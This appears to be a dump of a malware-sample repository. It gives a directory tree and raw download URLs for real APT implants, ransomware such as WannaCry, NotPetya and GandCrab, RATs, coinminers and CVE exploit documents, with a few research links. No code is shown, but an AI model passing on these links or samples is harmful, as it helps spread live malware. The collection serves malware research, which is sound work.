├── APT28 ├── APT28,NATOPAPER,SOFACY2004.bin ├── APT28DecoyDocument.doc ├── APT28DropperExcelDoc.xls ├── APT28Hospital.doc ├── APT28Implant.bin ├── APT28wmsApplication.exe ├── Backdoor.XTunnel.exe ├── DNC │ ├── VmUpgradeHelper.exeImplant.exe │ └── VmUpgradeHelper.exeX-Tunnel implant.exe ├── FancyBearZekapab.bin ├── FancyBearZekapabImplant.bin ├── FancyImplant.bin ├── LoJaxInfo_EFI.exe ├── LoJaxKernelDriver.bin ├── LoJaxSmallAgent.exe ├── LoJaxSmall_AgentDLL.exe ├── MacOSKomplexFancyBear.bin ├── X-AgentTrojan.bin ├── Xagent64.bin ├── ZekaAPT28.bin ├── ZekapabImplant.bin ├── ctlnetw.bin ├── rpcnetp.exe.bin ├── rpcnetpLojack.dll.bin └── twain_64DLL.dll ├── APT29 ├── APT29miniduke.bin ├── CozyBearImplant.bin ├── CozyBearNov2018New! │ ├── AudioSes.dll │ ├── CozybearNov2018Activity.txt │ ├── ds7001.zip │ ├── ds7002.bin │ └── ds7002.zip ├── ImplantCozy.bin ├── MinidukeAPT29.bin ├── SeaDaddyImplant (2).bin ├── SeaDaddyImplant.bin ├── TrojanCozyBear.bin └── atiagentCozyBear.bin ├── APT32 ├── APT32Info.txt ├── McUtil.dll ├── OceanLotusBackDoor.bin.gz ├── WinWord.bin.gz ├── rastls.dll.bin.gz └── 【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1 ├── APT34 ├── MagicHoundAPT34.doc ├── OilRigThreeDollars.bin ├── OilrigThreeDollarsMacro.bin └── QUADAGENTPowershell.bin ├── APT37 └── Final1stspy,Dropper.bin ├── APT40 ├── info.txt ├── 【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0 ├── 【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2 ├── 【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4 ├── 【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5 ├── 【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx ├── 【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx ├── 【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin └── 【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx ├── APT41 ├── info.txt └── 【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin ├── APTC23 ├── APT-C-23Info.txt ├── HexDownload.exe.bin └── MicropsiaRAT2018.bin ├── AZORult ├── info.txt ├── 【CVE-2017-11882】-1cc146d47918d23cee86a97c77f87918.doc ├── 【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx ├── 【CVE-2017-11882】-38649c7c2632f009b6d6c49da1b95708.doc ├── 【CVE-2017-11882】-42fb7157bd91775b9e8382c7ee500580 ├── 【CVE-2017-11882】-486689c6ce47a8dae0d3c5dcfcde492e.doc ├── 【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx └── 【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8 ├── CVE-2018-15982 ├── 22.bin ├── 33.bin └── GreatArticle.txt ├── Coinminers ├── AndroidBitcoinMiner.bin ├── PowerGhostMiner.bin ├── TrojanminerWin64.bin ├── msxml.exe └── pBotminer.bin ├── DPRK ├── BackdoorDLLworm.bin ├── BackdoorHiddenCobra.bin ├── BackdoorWormSMB2.0.exe ├── HiddenCobra.exe ├── HiddenCobraJoanap.bin ├── MoneroNorthKoreaPyongynag.bin ├── North Korea NavRat June 2018 │ ├── Application.bin │ ├── DLL#1.bin │ └── DLL#2.bin ├── RedDawnSunTeamAndroid.apk ├── SunTeamAndroid.apk └── SunTeamRedDawn.apk ├── DarkHydrus ├── DarkHydrus.bin ├── DarkHydrusImplant.bin ├── DarkHydrusInfo.txt ├── DarkHydrusPayload.bin ├── DarkHydrusPowershellScript.bin └── RogueRobinPowershellPayloadObfuscated.bin ├── DarkTequila └── DarkTequila.exe ├── DoquAPT └── DoquDropper.bin ├── Dridex ├── Dridex2ndstage.exe.bin ├── DridexDDEDropperdoc.bin ├── DridexInformation.txt ├── DridexbankerPacked.bin ├── dridexDroppedVBS.bin ├── dridexLoader.bin.exe.bin ├── dridexbanker.false └── dridexbankerzip.zip ├── DustSquad ├── DustSquadInformation.txt ├── OctopusDelphi.exe └── OctopusTelegramMessengerDropper.bin ├── Emotet └── EmotetInvoiceDoc.bin ├── EnergeticBear ├── BerserkBear Downloader.bin ├── Energetic Bear Implant └── Temp.IsotopeImplant.bin ├── EquationGroup ├── DiskFromHoustonEoPExploits.bin ├── DoubleFantasyInstaller.bin ├── EquationDrugLUTEUSOBSTOS ├── EquationGroupInfo.txt ├── EquationLaserInstaller.bin ├── FannyWorm.bin ├── GrayfishInstaller.bin ├── GrokKeylogger ├── HDDFirmware ├── SD_IP_CF.dll.bin └── TripleFantasy.bin ├── GamaredonGroup ├── GamaredonGroupINFO.txt ├── GamaredonImplant.bin ├── Pteranodon.bin ├── Pteranodon2.bin ├── Pteranodon3.bin ├── Pteranodon4.bin ├── Pteranodon5.bin ├── Pteranodon6.bin ├── PteranodonImplant.bin ├── PteranodonImplant7.bin └── photoshopimplant.bin ├── GandCrab ├── GandCrab v5.1(Include Decrypt Tools).zip ├── GandCrabV5.0.4.exe ├── GandCrabVariant.false ├── GandCrabv4.exe ├── GandCrabv5RandomExtension.bin ├── Gandcrab5.0.2.bin ├── Gandcrab5.0.3.exe ├── GandcrabV5.0.5.bin └── Gandcrabv5.0.2exe.bin ├── GazaAPTGroup ├── GazaGroupImplant.bin ├── GazaGroupInfo.txt ├── ImplantBigBang.bin ├── TheBigBang.bin ├── TheBigBangAPT.doc └── TheBigBangImplant.bin ├── Globelmposter ├── Globelmposter 3.0 .rar ├── GoziGroup ├── GoziBankerISFB.exe ├── HeVRmuUO.exe_.exe ├── KRKeMaIts.exe_.exe ├── lsPEcswsco.exe_.exe └── vCfjTmdR.exe_.exe ├── GreenbugAPT ├── GreenBugInfostealer.bin ├── Greenbug.bin ├── GreenbugAPTx64.bin ├── GreenbugInfo.txt └── ISMDoorx64.bin ├── GreyEnergyAPT ├── GreyEnergyDropper.bin ├── GreyEnergyDropper.doc ├── GreyEnergyDropper2.bin ├── GreyEnergyImplant2018.bin └── GreyEnergymini.bin ├── Hancitor ├── info.txt └── 【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9 ├── Lazarus IOC (20231027) ├── Lazarus IOC (20231101) ├── Lazarus IOC (20231108) ├── Lazarus IOC(20240511) ├── Lazarus(20231124).xlsx ├── Lazarus(20231127) ├── Lazarus ├── BlueNoroff_INK.zip ├── DangerousPassword.pdf ├── LazarusMacOS.bin.xltd ├── LazarusMacOS.bin.xltd.cfg ├── RyukRansomware.bin └── elfLazarus.bin ├── Lazarus_IOC(20240424) ├── Lazarus_IOC(20240528) ├── MiddleEastMalware ├── AndroidMalware.bin.xltd ├── AndroidMalware.bin.xltd.cfg └── EgyptianPDF.bin ├── MuddyWaterAPT ├── Cv.doc.bin ├── MuddyWaterAPTInformation.txt ├── shakva-lb.doc.bin └── 【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx ├── OlympicDestroyer ├── OlympicDestroyer.bin ├── OlympicDestroyerAtos.bin ├── OlympicSystemStealer.bin └── OlympicsSouthKorea.bin ├── README.md ├── Ransomeware ├── DharmaRansomware.bin ├── DistrictRansomware.bin ├── FoxRansomware.zip ├── KatyushaRansomware.bin ├── KrakenCryptor2.0.bin ├── MINOTAURransomware.false ├── MatrixRansomware.bin ├── NotPetya.bin ├── README ├── WannaCry.exe ├── WannaCry2.exe ├── WannaCryDLL.bin ├── __README__.txt ├── mcrypt.bin └── samsamRansomware.bin ├── Remcos RAT.zip ├── SLINGSHOT └── SlingShot.bin ├── SilverTerrier ├── info.txt ├── 【CVE-2017-11882】-4972fac34f773668a523ef51b4898387 ├── 【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e ├── 【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927 ├── 【CVE-2017-11882】-c1b04a9474ca64466ad4327546c20efc └── 【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08 ├── Stuxnet Malware ├── A0055521.sys ├── Copy of Shortcut to.lnk ├── KRvW5H2T.htm ├── index (1).html ├── index.html ├── malware.ex_ ├── ~WTR4132.tmp └── ~WTR4141.tmp ├── Triton ├── TRISIS-TRITON-HATMAN-master.zip └── TritonCRC.bin ├── Trojans ├── FormbookStealer.false ├── GlLgNm3t.htm ├── NanocoreRAT.bin ├── PasswordStealer.NET.bin ├── Razylokibot.bin └── Trickbotpwgrab.bin ├── Turla ├── CarbonImplant.bin ├── KazuarRAT.bin ├── NCSC.bin ├── Nautilus Implant.bin ├── NeuronImplant2018.bin ├── OutlookBackdoor.bin ├── OutlookBackdoor2.bin ├── TurlaAgent.exe ├── TurlaDropper.bin ├── TurlaKeylogger.bin └── TurlaSnakeImplant.bin ├── UNC1945 ├── info.txt └── 【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534 ├── UPXsamples ├── MiraiELFBackdoorUPX.bin ├── PackedRansomwareUPX.bin ├── ProcessHowllowingPacked.bin ├── SaturnRansomewareUPX.bin ├── ScarabRansomwareUPX.exe ├── TrojanUPXPacked.bin ├── Unlock26RansomewarePacked.bin ├── arsstealersafeloaderUPX.exe └── yodascrypterUPX.bin ├── VoodooBearAPT ├── BlackEnergy.bin └── BlackEnergyImplant.bin ├── WizardOpium ├── info.txt └── 【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin ├── __APTGroupInfoLinks.txt__ ├── __DO NOT RUN SAMPLES ON YOUR HOST COMPUTER! USE A VIRTUAL MACHINE__.txt └── __README__.txt /APT28/APT28,NATOPAPER,SOFACY2004.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28,NATOPAPER,SOFACY2004.bin -------------------------------------------------------------------------------- /APT28/APT28DecoyDocument.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28DecoyDocument.doc -------------------------------------------------------------------------------- /APT28/APT28DropperExcelDoc.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28DropperExcelDoc.xls -------------------------------------------------------------------------------- /APT28/APT28Hospital.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28Hospital.doc -------------------------------------------------------------------------------- /APT28/APT28Implant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28Implant.bin -------------------------------------------------------------------------------- /APT28/APT28wmsApplication.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28wmsApplication.exe -------------------------------------------------------------------------------- /APT28/Backdoor.XTunnel.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/Backdoor.XTunnel.exe -------------------------------------------------------------------------------- /APT28/DNC/VmUpgradeHelper.exeImplant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/DNC/VmUpgradeHelper.exeImplant.exe -------------------------------------------------------------------------------- /APT28/DNC/VmUpgradeHelper.exeX-Tunnel implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/DNC/VmUpgradeHelper.exeX-Tunnel implant.exe -------------------------------------------------------------------------------- /APT28/FancyBearZekapab.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyBearZekapab.bin -------------------------------------------------------------------------------- /APT28/FancyBearZekapabImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyBearZekapabImplant.bin -------------------------------------------------------------------------------- /APT28/FancyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyImplant.bin -------------------------------------------------------------------------------- /APT28/LoJaxInfo_EFI.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxInfo_EFI.exe -------------------------------------------------------------------------------- /APT28/LoJaxKernelDriver.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxKernelDriver.bin -------------------------------------------------------------------------------- /APT28/LoJaxSmallAgent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxSmallAgent.exe -------------------------------------------------------------------------------- /APT28/LoJaxSmall_AgentDLL.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxSmall_AgentDLL.exe -------------------------------------------------------------------------------- /APT28/MacOSKomplexFancyBear.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/MacOSKomplexFancyBear.bin -------------------------------------------------------------------------------- /APT28/X-AgentTrojan.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/X-AgentTrojan.bin -------------------------------------------------------------------------------- /APT28/Xagent64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/Xagent64.bin -------------------------------------------------------------------------------- /APT28/ZekaAPT28.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ZekaAPT28.bin -------------------------------------------------------------------------------- /APT28/ZekapabImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ZekapabImplant.bin -------------------------------------------------------------------------------- /APT28/ctlnetw.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ctlnetw.bin -------------------------------------------------------------------------------- /APT28/rpcnetp.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/rpcnetp.exe.bin -------------------------------------------------------------------------------- /APT28/rpcnetpLojack.dll.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/rpcnetpLojack.dll.bin -------------------------------------------------------------------------------- /APT28/twain_64DLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/twain_64DLL.dll -------------------------------------------------------------------------------- /APT29/APT29miniduke.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/APT29miniduke.bin -------------------------------------------------------------------------------- /APT29/CozyBearImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearImplant.bin -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/AudioSes.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/AudioSes.dll -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/CozybearNov2018Activity.txt: -------------------------------------------------------------------------------- 1 | AudoSes.dll - .DLL 2 | 3 | ds7001.zip - Contains Dropped PDF 4 | 5 | ds7002.bin - .lnk file drops powershell script 6 | 7 | ds7002.zip - Contains Dropped PDF -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7001.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7001.zip -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7002.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7002.bin -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7002.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7002.zip -------------------------------------------------------------------------------- /APT29/ImplantCozy.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/ImplantCozy.bin -------------------------------------------------------------------------------- /APT29/MinidukeAPT29.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/MinidukeAPT29.bin -------------------------------------------------------------------------------- /APT29/SeaDaddyImplant (2).bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/SeaDaddyImplant (2).bin -------------------------------------------------------------------------------- /APT29/SeaDaddyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/SeaDaddyImplant.bin -------------------------------------------------------------------------------- /APT29/TrojanCozyBear.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/TrojanCozyBear.bin -------------------------------------------------------------------------------- /APT29/atiagentCozyBear.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/atiagentCozyBear.bin -------------------------------------------------------------------------------- /APT32/APT32Info.txt: -------------------------------------------------------------------------------- 1 | httpswww.welivesecurity.comwp-contentuploads201803ESET_OceanLotus.pdf 2 | 3 | httpswww.welivesecurity.com20180313oceanlotus-ships-new-backdoor -------------------------------------------------------------------------------- /APT32/McUtil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/McUtil.dll -------------------------------------------------------------------------------- /APT32/OceanLotusBackDoor.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/OceanLotusBackDoor.bin.gz -------------------------------------------------------------------------------- /APT32/WinWord.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/WinWord.bin.gz -------------------------------------------------------------------------------- /APT32/rastls.dll.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/rastls.dll.bin.gz -------------------------------------------------------------------------------- /APT32/【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1 -------------------------------------------------------------------------------- /APT34/MagicHoundAPT34.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/MagicHoundAPT34.doc -------------------------------------------------------------------------------- /APT34/OilRigThreeDollars.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/OilRigThreeDollars.bin -------------------------------------------------------------------------------- /APT34/OilrigThreeDollarsMacro.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/OilrigThreeDollarsMacro.bin -------------------------------------------------------------------------------- /APT34/QUADAGENTPowershell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/QUADAGENTPowershell.bin -------------------------------------------------------------------------------- /APT37/Final1stspy,Dropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT37/Final1stspy,Dropper.bin -------------------------------------------------------------------------------- /APT40/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx -------------------------------------------------------------------------------- /APT41/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /APT41/【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT41/【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin -------------------------------------------------------------------------------- /APTC23/APT-C-23Info.txt: -------------------------------------------------------------------------------- 1 | https://research.checkpoint.com/interactive-mapping-of-apt-c-23/ -------------------------------------------------------------------------------- /APTC23/HexDownload.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APTC23/HexDownload.exe.bin -------------------------------------------------------------------------------- /APTC23/MicropsiaRAT2018.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APTC23/MicropsiaRAT2018.bin -------------------------------------------------------------------------------- /AZORult/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /AZORult/【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx -------------------------------------------------------------------------------- /AZORult/【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx -------------------------------------------------------------------------------- /AZORult/【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8 -------------------------------------------------------------------------------- /CVE-2018-15982/22.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/CVE-2018-15982/22.bin -------------------------------------------------------------------------------- /CVE-2018-15982/33.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/CVE-2018-15982/33.bin -------------------------------------------------------------------------------- /CVE-2018-15982/GreatArticle.txt: -------------------------------------------------------------------------------- 1 | https://ti.360.net/blog/articles/flash-0day-hacking-team-rat-activities-of-exploiting-latest-flash-0day-vulnerability-and-correlation-analysis-en/ -------------------------------------------------------------------------------- /Coinminers/AndroidBitcoinMiner.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/AndroidBitcoinMiner.bin -------------------------------------------------------------------------------- /Coinminers/PowerGhostMiner.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/PowerGhostMiner.bin -------------------------------------------------------------------------------- /Coinminers/TrojanminerWin64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/TrojanminerWin64.bin -------------------------------------------------------------------------------- /Coinminers/msxml.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/msxml.exe -------------------------------------------------------------------------------- /Coinminers/pBotminer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/pBotminer.bin -------------------------------------------------------------------------------- /DPRK/BackdoorDLLworm.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorDLLworm.bin -------------------------------------------------------------------------------- /DPRK/BackdoorHiddenCobra.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorHiddenCobra.bin -------------------------------------------------------------------------------- /DPRK/BackdoorWormSMB2.0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorWormSMB2.0.exe -------------------------------------------------------------------------------- /DPRK/HiddenCobra.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/HiddenCobra.exe -------------------------------------------------------------------------------- /DPRK/HiddenCobraJoanap.bin: -------------------------------------------------------------------------------- 